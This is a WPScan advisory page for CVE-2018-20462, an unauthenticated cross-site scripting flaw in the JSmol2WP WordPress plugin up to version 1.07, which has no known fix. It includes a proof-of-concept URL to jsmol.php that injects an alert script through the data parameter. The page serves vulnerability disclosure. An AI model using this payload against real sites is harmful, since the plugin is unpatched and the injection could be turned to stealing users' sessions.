WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

JSmol2WP <= 1.07 - Unauthenticated Cross-Site Scripting (XSS)

Description

The jsmol2wp WordPress plugin was affected by an Unauthenticated Cross-Site Scripting (XSS) security vulnerability.

Proof of Concept

http://localhost:8080/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3Cscript%3Ealert(/xss/)%3C/script%3E&mimetype=text/html;%20charset=utf-8

Affects Plugins

jsmol2wp
No known fix - plugin closed

References

CVE
CVE-2018-20462
URL
https://www.cbiu.cc/2018/12/WordPress%E6%8F%92%E4%BB%B6jsmol2wp%E6%BC%8F%E6%B4%9E/#%E5%8F%8D%E5%B0%84%E6%80%A7XSS

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Submitter

Ryan Dewhurst

Submitter twitter
ethicalhack3r
Verified

Yes

WPVDB ID
0bbf1542-6e00-4a68-97f6-48a7790d1c3e

Timeline

Publicly Published

2019-01-07 (about 4 years ago)

Added

2019-01-08 (about 4 years ago)

Last Updated

2020-09-22 (about 2 years ago)

Our Other Services

WPScan WordPress Security Plugin